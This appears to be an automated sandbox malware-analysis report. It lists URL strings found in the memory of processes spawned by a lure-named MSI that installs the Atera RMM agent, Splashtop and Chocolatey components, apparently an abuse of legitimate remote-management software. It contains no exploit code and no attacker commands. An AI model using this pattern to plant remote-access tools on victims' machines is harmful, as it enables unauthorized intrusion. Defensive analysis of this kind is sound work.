                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0K
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0N
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C19000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477540000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A620000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055ADA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A59000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 
0000002F.00000002.2274299424.0000010B0015E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00162000.00000004.00000800.00020000.00000000.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msiString found in binary or memory: http://ocsp.digicert.com0X
                                Source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
                                Source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A5E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                                Source: AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A23A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crlP
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B0013B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://packagesstore.blob.core.windows.net
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://poshcode.org/2513
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://poshcode.org/417
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://powershell.com/cs/blogs/tips/archive/2009/02/05/validating-a-url.aspx
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.atera.com
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882192000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A88217A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.pndsn.com
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://pwnt.co
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://rawcdn.githack.com/
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2571688057.00000248459E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s-part-0044.t-0009.fb-t-msedge.net
                                Source: AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                                Source: AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                                Source: AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceProcess
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: rundll32.exe, 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB671000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2571688057.0000024845621000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2103371672.000001CC12D40000.00000004.00000800.00020000.00000000.sdmp, 
AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.00000165983D9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.000001326286F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B72D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://somehwere/something.exe
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://somewhere.com/downloads/Install-WindowsImage.ps1
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://somewhere.com/downloads/Install-WindowsImagex64.ps1
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://somewhere123zzaafasd.invalid
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://somewhere123zzaafasd.invalidUAttempting
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stackoverflow.com/a/13571471/18475
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B4181000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stackoverflow.com/a/15281070/18475
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stackoverflow.com/questions/265339/whats-the-best-way-to-automate-secure-ftp-in-powershell
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stackoverflow.com/questions/518181/too-many-automatic-redirections-were-attempted-error-messa
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B4181000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stanislavs.org/stopping-command-line-applications-programatically-with-ctrl-c-events-from-net
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stexbar.googlecode.com/files/StExBar-1.8.3.msi
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://stexbar.googlecode.com/files/StExBar64-1.8.3.msi
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages#how-do-i-exclude-executables-from-getting-s
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages#how-do-i-set-up-shims-for-applications-that
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages#package-icon-guidelines
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-chocolateyunzipp
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-chocolateywebfile
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-osarchitecturewidth
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-toolslocation
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-binfile
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyenvironmentvariable
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyfileassociation
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyinstallpackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateypackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateypath
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyshortcut
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyvsixpackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyzippackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/start-chocolateyprocessasadmin
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-binfile
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateyenvironmentvariable
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateypackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateyzippackage
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/features/extensions
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/features/private-cdn.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/getting-started#overriding-default-install-directory-or-other-adva
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/create-custom-package-templates
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/mount-an-iso-in-chocolatey-package
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/parse-packageparameters-argument
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/parse-packageparameters-argument#step-3---use-core-c
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/information/legal.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/troubleshooting
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.nuget.org/create/Nuspec-Reference.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.nuget.org/create/versioning#creating-prerelease-packages
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://docs.nuget.org/create/versioning#specifying-version-ranges-in-.nuspec-files
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A62000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A3C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com/csrs/Splashtop_Streamer_Win_DEPLOY_INSTALLER_v3.7.2.0.exe
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B4181000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://gist.github.com/jvshahid/6fb2f91fa7fb1db23599
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582261573.000001FD41872000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1830316893.0000022AD9402000.00000002.00000001.01000000.00000026.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2126065368.000001CC2B560000.00000002.00000001.01000000.00000034.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                                Source: CliWrap.dll.26.drString found in binary or memory: https://github.com/Tyrrrz/CliWrap
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/choco/blob/bfe351b7d10c798014efe4bfbb100b171db25099/src/chocolatey/inf
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/choco/issues/1800#issuecomment-484293844.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/choco/issues/new/choose.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey-coreteampackages
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey-test-environment
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey-workshop
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/chocolatey/shimgen/tree/master/shim.
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmp, ChocolateyTabExpansion.ps1.53.drString found in binary or memory: https://github.com/dahlbyk/posh-git
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmp, ChocolateyTabExpansion.ps1.53.drString found in binary or memory: https://github.com/dahlbyk/posh-git/blob/1941da2472eb668cde2d6a5fc921d5043a024386/LICENSE.txt
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, System.ValueTuple.dll.16.dr, System.Diagnostics.DiagnosticSource.dll.16.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, System.ValueTuple.dll.16.dr, System.Diagnostics.DiagnosticSource.dll.16.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
                                Source: System.Buffers.dll.26.drString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
                                Source: System.Buffers.dll.26.drString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/roslyn/issues/46646
                                Source: System.Security.Cryptography.OpenSsl.dll.2.dr, System.Security.AccessControl.dll.2.dr, System.Data.DataSetExtensions.dll.2.dr, System.Reflection.Primitives.dll.2.dr, System.Xml.XmlSerializer.dll.2.dr, System.Runtime.Serialization.Json.dll.2.dr, System.IO.UnmanagedMemoryStream.dll.2.drString found in binary or memory: https://github.com/dotnet/runtime
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/73124.
                                Source: System.Security.Cryptography.OpenSsl.dll.2.drString found in binary or memory: https://github.com/dotnet/runtimeBSJB
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/downloads/spraints/git-tfs/GitTfs-0.11.0.zip
                                Source: AteraAgent.exe, 00000010.00000002.1925066470.0000023477EB2000.00000002.00000001.01000000.00000028.sdmpString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                                Source: AgentPackageInternalPoller.exe, 00000037.00000002.2129021473.000001CC2B782000.00000002.00000001.01000000.00000035.sdmpString found in binary or memory: https://github.com/lextudio/sharpsnmplib.git
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: https://github.com/majkinetor/au-packages/commit/bf95d56fe5851ee2e4f6f15f79c1a2877a7950a1
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://licensedpackages.chocolatey.org/api/v2/
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000020.00000000.1634120098.0000027054F02000.00000002.00000001.01000000.0000001C.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.splashtop.com/csrs/win
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1830156930.0000022AD93F8000.00000002.00000001.01000000.00000025.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: https://nlog-project.org/
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Agents/Mac/
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/BitDefender/rmm.zip
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric/MSI/1.8.7.2/Setupx64.msi
